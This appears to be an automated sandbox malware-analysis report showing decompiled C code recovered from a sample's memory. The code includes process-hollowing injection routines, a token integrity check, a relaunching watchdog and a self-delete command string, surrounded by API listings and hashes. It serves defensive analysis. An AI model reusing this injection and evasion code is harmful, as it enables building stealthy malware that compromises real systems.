                                                                                                                                          0x00407a78
                                                                                                                                          0x00407a78
                                                                                                                                          0x004079b8
                                                                                                                                          0x004079be
                                                                                                                                          0x004079c4
                                                                                                                                          0x004079c6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004079c6
                                                                                                                                          0x00407929
                                                                                                                                          0x00407933
                                                                                                                                          0x00407935
                                                                                                                                          0x00407938
                                                                                                                                          0x0040793a
                                                                                                                                          0x00407948
                                                                                                                                          0x0040794d
                                                                                                                                          0x00407950
                                                                                                                                          0x00407952
                                                                                                                                          0x00000000
                                                                                                                                          0x00407958
                                                                                                                                          0x0040795e
                                                                                                                                          0x00407969
                                                                                                                                          0x00407974
                                                                                                                                          0x00407979
                                                                                                                                          0x0040797c
                                                                                                                                          0x00407982
                                                                                                                                          0x00407984
                                                                                                                                          0x00407985
                                                                                                                                          0x00407987
                                                                                                                                          0x00000000
                                                                                                                                          0x0040798d
                                                                                                                                          0x0040798d
                                                                                                                                          0x00407992
                                                                                                                                          0x00000000
                                                                                                                                          0x00407992
                                                                                                                                          0x00407987
                                                                                                                                          0x00407952
                                                                                                                                          0x0040793a
                                                                                                                                          0x00407927
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a1
                                                                                                                                          0x004078a1
                                                                                                                                          0x004078a6
                                                                                                                                          0x004078a6
                                                                                                                                          0x0040789e
                                                                                                                                          0x004078b0
                                                                                                                                          0x004078b2
                                                                                                                                          0x004078c5
                                                                                                                                          0x004078d6
                                                                                                                                          0x004078e7
                                                                                                                                          0x004078f3
                                                                                                                                          0x004078fb
                                                                                                                                          0x00407902
                                                                                                                                          0x00407902
                                                                                                                                          0x0040786b
                                                                                                                                          0x0040776a
                                                                                                                                          0x00407754
                                                                                                                                          0x0040773e
                                                                                                                                          0x00407724
                                                                                                                                          0x004076f3
                                                                                                                                          0x004076f3
                                                                                                                                          0x004076fe
                                                                                                                                          0x004076fe
                                                                                                                                          0x004076f1
                                                                                                                                          0x004076c3

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407C30: InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                                                          • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 00407715
                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004078B0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CrackDeleteFileInternetLongNamePath
                                                                                                                                          • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$LKBNMTFJgl$ProgramData$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV$zJ@
                                                                                                                                          • API String ID: 3724707802-3486364815
                                                                                                                                          • Opcode ID: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                                                          • Instruction ID: 401daa4757a0587c7b000174fcf8883a011eebc5c06fd5704f7b7c2f209f5124
                                                                                                                                          • Opcode Fuzzy Hash: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                                                          • Instruction Fuzzy Hash: 1C91B9B1E4420876DB20B7A59C06FDB376CAF00745F04007BF904B21D2EA7CBA54CAAE
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00405B80, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 237threadsleepprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E00405B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E00401BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x40c074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x40c038)) - 0x4550;
					_t6 = _t62 + 0x40c038; // 0x3875f8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x40c038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E00401670( &_v112, 0, 0x44);
						E00401670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x5d1bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t14 =  &_v16; // 0x4049e6
							_t72 = GetThreadContext( *_t14,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E004072C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E004074D0(_t82,  &_v36, _v20, _t82, _t123, 0x40c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x3875f923
													_t90 = E004074D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E004071A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E00401BB0(_t133, 0, 0x138);
																	E004074D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x3875f91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E004074D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x40c038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E00407120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x40c038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}





































                                                                                                                                          0x00405b80
                                                                                                                                          0x00405b98
                                                                                                                                          0x00405ba2
                                                                                                                                          0x00405ba9
                                                                                                                                          0x00405bac
                                                                                                                                          0x00405bb3
                                                                                                                                          0x00405bbd
                                                                                                                                          0x00405bc4
                                                                                                                                          0x00405bef
                                                                                                                                          0x00405bef
                                                                                                                                          0x00405bf4
                                                                                                                                          0x00405bff
                                                                                                                                          0x00405bff
                                                                                                                                          0x00405c05
                                                                                                                                          0x00405e53
                                                                                                                                          0x00405e54
                                                                                                                                          0x00405e5a
                                                                                                                                          0x00405c0b
                                                                                                                                          0x00405c13
                                                                                                                                          0x00405c20
                                                                                                                                          0x00405c28
                                                                                                                                          0x00405c2f
                                                                                                                                          0x00405c39
                                                                                                                                          0x00405c3d
                                                                                                                                          0x00405c3e
                                                                                                                                          0x00405c40
                                                                                                                                          0x00405c42
                                                                                                                                          0x00405c4b
                                                                                                                                          0x00405c44
                                                                                                                                          0x00405c44
                                                                                                                                          0x00405c44
                                                                                                                                          0x00405c58
                                                                                                                                          0x00405c5e
                                                                                                                                          0x00405c60
                                                                                                                                          0x00000000
                                                                                                                                          0x00405c66
                                                                                                                                          0x00405c66
                                                                                                                                          0x00405c6e
                                                                                                                                          0x00405c71
                                                                                                                                          0x00405c77
                                                                                                                                          0x00405c79
                                                                                                                                          0x00405e2f
                                                                                                                                          0x00405e34
                                                                                                                                          0x00405e43
                                                                                                                                          0x00405e48
                                                                                                                                          0x00405e4c
                                                                                                                                          0x00405e52
                                                                                                                                          0x00405c7f
                                                                                                                                          0x00405c96
                                                                                                                                          0x00405c9c
                                                                                                                                          0x00405c9e
                                                                                                                                          0x00000000
                                                                                                                                          0x00405ca4
                                                                                                                                          0x00405ca4
                                                                                                                                          0x00405ca7
                                                                                                                                          0x00405caa
                                                                                                                                          0x00405cac
                                                                                                                                          0x00405cca
                                                                                                                                          0x00405cdc
                                                                                                                                          0x00405ce1
                                                                                                                                          0x00405ce3
                                                                                                                                          0x00405ce6
                                                                                                                                          0x00405ce8
                                                                                                                                          0x00000000
                                                                                                                                          0x00405cee
                                                                                                                                          0x00405cee
                                                                                                                                          0x00405cf3
                                                                                                                                          0x00405cf6
                                                                                                                                          0x00405cfd
                                                                                                                                          0x00405d0a
                                                                                                                                          0x00405d0f
                                                                                                                                          0x00405d11
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d17
                                                                                                                                          0x00405d17
                                                                                                                                          0x00405d1d
                                                                                                                                          0x00405d1f
                                                                                                                                          0x00405d23
                                                                                                                                          0x00405d65
                                                                                                                                          0x00405d6b
                                                                                                                                          0x00405d7e
                                                                                                                                          0x00405d83
                                                                                                                                          0x00405d85
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d8b
                                                                                                                                          0x00405d90
                                                                                                                                          0x00405da0
                                                                                                                                          0x00405da6
                                                                                                                                          0x00405da8
                                                                                                                                          0x00000000
                                                                                                                                          0x00405dae
                                                                                                                                          0x00405db1
                                                                                                                                          0x00405db6
                                                                                                                                          0x00405db8
                                                                                                                                          0x00000000
                                                                                                                                          0x00405dba
                                                                                                                                          0x00405dbf
                                                                                                                                          0x00405dd9
                                                                                                                                          0x00405ddb
                                                                                                                                          0x00405ddd
                                                                                                                                          0x00405de7
                                                                                                                                          0x00405e02
                                                                                                                                          0x00405e0f
                                                                                                                                          0x00405e0f
                                                                                                                                          0x00405e1e
                                                                                                                                          0x00405e23
                                                                                                                                          0x00405e2e
                                                                                                                                          0x00405e2e
                                                                                                                                          0x00405db8
                                                                                                                                          0x00405da8
                                                                                                                                          0x00405d25
                                                                                                                                          0x00405d25
                                                                                                                                          0x00405d28
                                                                                                                                          0x00405d2a
                                                                                                                                          0x00405d30
                                                                                                                                          0x00405d49
                                                                                                                                          0x00405d4e
                                                                                                                                          0x00405d50
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d5a
                                                                                                                                          0x00405d5b
                                                                                                                                          0x00405d5e
                                                                                                                                          0x00405d60
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d62
                                                                                                                                          0x00405d62
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d62
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d60
                                                                                                                                          0x00000000
                                                                                                                                          0x00405d30
                                                                                                                                          0x00405d23
                                                                                                                                          0x00405d11
                                                                                                                                          0x00405cae
                                                                                                                                          0x00405cb3
                                                                                                                                          0x00405cb5
                                                                                                                                          0x00000000
                                                                                                                                          0x00405cb7
                                                                                                                                          0x00405cc2
                                                                                                                                          0x00405cc4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405cc4
                                                                                                                                          0x00405cb5
                                                                                                                                          0x00405cac
                                                                                                                                          0x00405c9e
                                                                                                                                          0x00405c79
                                                                                                                                          0x00405c60
                                                                                                                                          0x00405bc6
                                                                                                                                          0x00405bd7
                                                                                                                                          0x00405bdc
                                                                                                                                          0x00405bdf
                                                                                                                                          0x00405be6
                                                                                                                                          0x00000000
                                                                                                                                          0x00405be8
                                                                                                                                          0x00405bee
                                                                                                                                          0x00405bee
                                                                                                                                          0x00405be6
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32 ref: 00405C58
                                                                                                                                          • GetThreadContext.KERNEL32(I@,00010007,00000000,?,?,?,?,?,I@,?,?,?), ref: 00405C71
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,I@,?,?,?), ref: 00405C96
                                                                                                                                          • SetThreadContext.KERNEL32(?,?,?,?,00000000,3875F923,00000004,?,?,00000000,?,0040C038,?,?,?,?), ref: 00405DA0
                                                                                                                                          • Sleep.KERNEL32(00001388,?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DBF
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DD3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000040), ref: 00405E0F
                                                                                                                                          • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E1E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E23
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                                                          • String ID: 0125789244697858$D$I@$I@
                                                                                                                                          • API String ID: 1428767187-3701513222
                                                                                                                                          • Opcode ID: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                                                          • Instruction ID: 2b955a6b4a58cd15ef933bbb3afc0f250c4904853c31c428a9eccdac0ead69e9
                                                                                                                                          • Opcode Fuzzy Hash: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                                                          • Instruction Fuzzy Hash: 91819071A40619ABEB109B90DD46FAFB7B8FB04704F044176FA04B62D0E775AA50CB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00405A50, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                          			E00405A50(void* __ecx, void* _a4, void* _a8, long* _a12, char _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				_t2 =  &_a16; // 0x40563b
				 *( *_t2) = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												_t17 =  &_a16; // 0x40563b
												 *((intOrPtr*)( *_t17)) =  *((intOrPtr*)(_t60 + 0x28));
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}











                                                                                                                                          0x00405a61
                                                                                                                                          0x00405a67
                                                                                                                                          0x00405a73
                                                                                                                                          0x00405a7b
                                                                                                                                          0x00405a7f
                                                                                                                                          0x00405aa4
                                                                                                                                          0x00405aab
                                                                                                                                          0x00405a81
                                                                                                                                          0x00405a94
                                                                                                                                          0x00405ab4
                                                                                                                                          0x00000000
                                                                                                                                          0x00405ab6
                                                                                                                                          0x00405ac8
                                                                                                                                          0x00405acb
                                                                                                                                          0x00405ada
                                                                                                                                          0x00405ade
                                                                                                                                          0x00405b49
                                                                                                                                          0x00405b51
                                                                                                                                          0x00405ae0
                                                                                                                                          0x00405ae3
                                                                                                                                          0x00405aef
                                                                                                                                          0x00405af2
                                                                                                                                          0x00405af8
                                                                                                                                          0x00405afd
                                                                                                                                          0x00405aff
                                                                                                                                          0x00405b02
                                                                                                                                          0x00405b47
                                                                                                                                          0x00405b47
                                                                                                                                          0x00000000
                                                                                                                                          0x00405b0c
                                                                                                                                          0x00405b10
                                                                                                                                          0x00405b19
                                                                                                                                          0x00405b25
                                                                                                                                          0x00405b29
                                                                                                                                          0x00000000
                                                                                                                                          0x00405b2b
                                                                                                                                          0x00405b35
                                                                                                                                          0x00405b3b
                                                                                                                                          0x00405b40
                                                                                                                                          0x00405b42
                                                                                                                                          0x00405b45
                                                                                                                                          0x00405b58
                                                                                                                                          0x00000000
                                                                                                                                          0x00405b5a
                                                                                                                                          0x00405b60
                                                                                                                                          0x00405b62
                                                                                                                                          0x00405b68
                                                                                                                                          0x00405b6a
                                                                                                                                          0x00405b74
                                                                                                                                          0x00405b74
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405b45
                                                                                                                                          0x00405b29
                                                                                                                                          0x00405b02
                                                                                                                                          0x00405ade
                                                                                                                                          0x00405a96
                                                                                                                                          0x00405a96
                                                                                                                                          0x00405a9e
                                                                                                                                          0x00000000
                                                                                                                                          0x00405a9e
                                                                                                                                          0x00405a94

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,74B05B60,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A79
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A8C
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405A9E
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,I@,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AD8
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AF2
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B10
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B1F
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B35
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B47
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B6A
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                                                          • String ID: ;V@$I@
                                                                                                                                          • API String ID: 1260273505-1952863460
                                                                                                                                          • Opcode ID: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                                                          • Instruction ID: 663560f153661f58489f41854f68c215dbd6861c452647dabd8b659e9ddec512
                                                                                                                                          • Opcode Fuzzy Hash: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                                                          • Instruction Fuzzy Hash: C4314F71741714BBEB309F95DC41F9B7BA8EB05B11F100065FB04AB2D1D6B5AD008FA8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004082B0, Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E004082B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E004015E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E00407AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E00401510();
								CloseHandle(_v8);
								return 0;
							} else {
								E00401510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}










                                                                                                                                          0x004082b9
                                                                                                                                          0x004082c3
                                                                                                                                          0x004082d9
                                                                                                                                          0x00408306
                                                                                                                                          0x0040830b
                                                                                                                                          0x004082db
                                                                                                                                          0x004082f0
                                                                                                                                          0x00408310
                                                                                                                                          0x00408315
                                                                                                                                          0x00408318
                                                                                                                                          0x0040832f
                                                                                                                                          0x0040833d
                                                                                                                                          0x00000000
                                                                                                                                          0x00408356
                                                                                                                                          0x0040835b
                                                                                                                                          0x00408360
                                                                                                                                          0x00408363
                                                                                                                                          0x00408366
                                                                                                                                          0x0040833e
                                                                                                                                          0x0040833e
                                                                                                                                          0x00408349
                                                                                                                                          0x00408355
                                                                                                                                          0x00408368
                                                                                                                                          0x00408368
                                                                                                                                          0x00408373
                                                                                                                                          0x00408382
                                                                                                                                          0x00408382
                                                                                                                                          0x00408366
                                                                                                                                          0x004082fd
                                                                                                                                          0x00408300
                                                                                                                                          0x00000000
                                                                                                                                          0x00408300
                                                                                                                                          0x004082f0

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 004082CA
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004082D1
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004082E8
                                                                                                                                          • GetLastError.KERNEL32 ref: 004082F2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408300
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00408327
                                                                                                                                          • IsValidSid.ADVAPI32(00000000), ref: 00408333
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408349
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2832165296-0
                                                                                                                                          • Opcode ID: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                                                          • Instruction ID: 6c80d8c1505064fb5d23a14c91f2f6bbea28928c87bc453829ba29e9ce75709a
                                                                                                                                          • Opcode Fuzzy Hash: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                                                          • Instruction Fuzzy Hash: F5215E31A00108FBEF116FA0EE0AB9E7FB9EF54745F1000B5F945F51A1EB768E109A99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408390, Relevance: 13.6, APIs: 9, Instructions: 65threadsleepprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E00408390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					if(GetExitCodeProcess(_t35,  &_v8) == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0);
				}
				CloseHandle(_t35);
				E00401BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}







                                                                                                                                          0x004083ab
                                                                                                                                          0x004083af
                                                                                                                                          0x00408447
                                                                                                                                          0x00408447
                                                                                                                                          0x004083c1
                                                                                                                                          0x004083c4
                                                                                                                                          0x004083d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004083e8
                                                                                                                                          0x004083e8
                                                                                                                                          0x004083f3
                                                                                                                                          0x004083fd
                                                                                                                                          0x00408408
                                                                                                                                          0x0040840b
                                                                                                                                          0x0040842c
                                                                                                                                          0x00408435
                                                                                                                                          0x0040843a
                                                                                                                                          0x0040843f

                                                                                                                                          APIs
                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004083A5
                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 004083CD
                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 004083E8
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004083F3
                                                                                                                                          • CreateProcessW.KERNEL32 ref: 0040842C
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00408435
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040843A
